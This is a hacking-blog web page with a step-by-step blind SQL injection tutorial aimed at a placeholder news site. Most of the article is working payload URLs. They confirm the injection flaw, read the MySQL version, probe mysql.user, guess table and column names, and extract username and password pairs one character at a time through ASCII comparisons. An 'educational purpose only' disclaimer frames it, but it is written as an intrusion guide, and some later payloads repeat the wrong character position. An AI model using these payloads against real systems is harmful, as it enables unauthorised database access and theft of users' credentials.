<html>
<head>
  <title>Blind SQL Injection Tutorial | Hackism.net</title>
  <meta charset="UTF-8">
  <meta name="keywords" content="Hackism, hackism.net, sqli, xss, hackers, hack, ddos, deface, cyber, anon, anonymous, HTML, CSS, XML, XHTML, JavaScript">
  <meta name="author" content="Aayush Agarwal">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content="">
  <link rel="shortcut icon" href="img/fav.ico" type="image/x-icon" />
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.min.css">
  <link rel="stylesheet" href="css/tuts.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <link href="https://fonts.googleapis.com/css?family=Josefin+Sans:300i" rel="stylesheet"> 
  <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/angularjs/1.0.7/angular.min.js"></script>
</head>

<body>

<nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
 <div class="container" style="padding-right: 15px; padding-left: 15px; margin-right: auto; margin-left: auto;">
  <div class="navbar-header">
    <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
    </button>    
    <a class="navbar-brand" href="http://hackism.net">Hackism</a>
  </div>
  <div class="navbar-collapse collapse">
    <ul class="nav navbar-nav navbar-right">
      <li><a href="../index.html">Home</a></li>
      <li><a href="index.html">Tutorials</a></li>
    </ul>
  </div>
 </div>
</nav>




<div class="jumbotron">
<div  style="margin-top: 2%;">
 <h1>hacking blog,<br>because we love reading.</h1>
 <hr width="90%">
</div>
</div>

<div class="container">

<div class="col-md-12 text-center" style="background-color: #FF5050; color: #fff; padding: 5px;">
<b>NOTE : this article is for educational purpose only<br>we are not responsible for any acts.</b>
</div>

<!--edit-->

<div class="col-sm-9 col-md-6 col-lg-8" style="background-color:#fff;">
<h2 class="text-center">blind SQL injection tutorial</h2><hr>

<!--image-->
<img src="img/tuts/sqli.png" class="img-responsive">


<!--required-->
<h4>so what you require?</h4>
<p>
 <ul>
  <li>patience</li>
  <li>mind</li>
 </ul>
</p><br>
 
<!--tut starts-->

<h4>how it works :</h4>

In simple words, SQL Injection is a vulnerability of Databases that can be used to break into the database.
I have already posted the SQL Injection basics and Classic SQL Injection.
Before we start the tutorial I would like to tell you that there are many tools that can automate this lengthy process but believe me this manual method will make you a better SQL Injector.

<h4>So lets start :</h4>

I will be using our example

<pre>http://www.site.com/news.php?id=5</pre>

when we execute this, we see some page and articles on that page, pictures etc...
then when we want to test it for blind sql injection attack

<pre>http://www.site.com/news.php?id=5 and 1=1 <--- this is always true</pre>

and the page loads normally, that's ok.
now the real test.

<pre>http://www.site.com/news.php?id=5 and 1=2 <--- this is false</pre>

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

<h4>1. Get the MySQL version</h4>

to get the version in blind attack we use substring i.e

<pre>http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4</pre>

this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e

<pre>http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5</pre>

<h4>2. Test if subselect works</h4>

when select don't work then we use subselect
i.e

<pre>http://www.site.com/news.php?id=5 and (select 1)=1</pre>

if page loads normally then subselects work.
then we gonna see if we have access to mysql.user
i.e

<pre>http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1</pre>

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

<h4>3. Check table and column names</h4>

This is part when guessing is the best friend :)
i.e. 

<pre>http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1</pre>

(with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)
let's say that we have found that table name is users, now what we need is column name.
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e

<pre>http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1</pre>

if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)

<h4>4. Pull data from database</h4>

we found table users i columns username password so we gonna pull characters from that.

<pre>http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80</pre>

ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.

<pre>http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95</pre>

we get TRUE, keep incrementing

<pre>http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98</pre>

TRUE again, higher

<pre>http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99</pre>

FALSE!!!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.
then let's check the second character.

<pre>http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99</pre>

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

<pre>http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99</pre>

TRUE, the page loads normally, higher.

<pre>http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107</pre>

FALSE, lower number.

<pre>http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104</pre>

TRUE, higher.

<pre>http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105</pre>

FALSE!!!
we know that the second character is char(105) and that is 'i'. We have 'ci' so far
so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).


<hr>

<!--author-->

<div class="author">
  <blockquote>Blind SQL injection tutorial<small style="text-align:right;">by Somdev.</small></blockquote>
</div>



</div> <!--left div end-->


<!--ads-->


<div class="col-sm-3 col-md-6 col-lg-4" style="background-color:#333;">
<img src="img/ads1.png" width="100%">
</div>
<div class="col-sm-3 col-md-6 col-lg-4" style="background-color:#333;">
<img src="img/ads2.png" width="100%">
</div>
<div class="col-sm-3 col-md-6 col-lg-4" style="background-color:#333;">
<img src="img/ads3.png" width="100%">
</div>


</div> <!--container-fluid end-->


<!--footer-->
<br>
<footer class="container-fluid">
 <center>       
  <div style="font-size: 30px;">
   <a href="https://www.facebook.com"><i class="fa fa-facebook-official" aria-hidden="true"></i></a>
   <a href="https://www.twitter.com"><i class="fa fa-twitter-square" aria-hidden="true"></i></a>
   <a href="https://www.linkedin.com"><i class="fa fa-linkedin-square" aria-hidden="true"></i></a>
  </div>       
  <div class="text-center" style="font-size: 15px;">
   <a href="#">terms & conditions</a>&nbsp;
   <a href="#">privacy policy</a>&nbsp;
   <a href="#">contact us</a>&nbsp;
  </div>
   <p style="margin: 5px;">Hackism Technologies &copy 2016</p>
 </center>
</footer>



</body>
</html>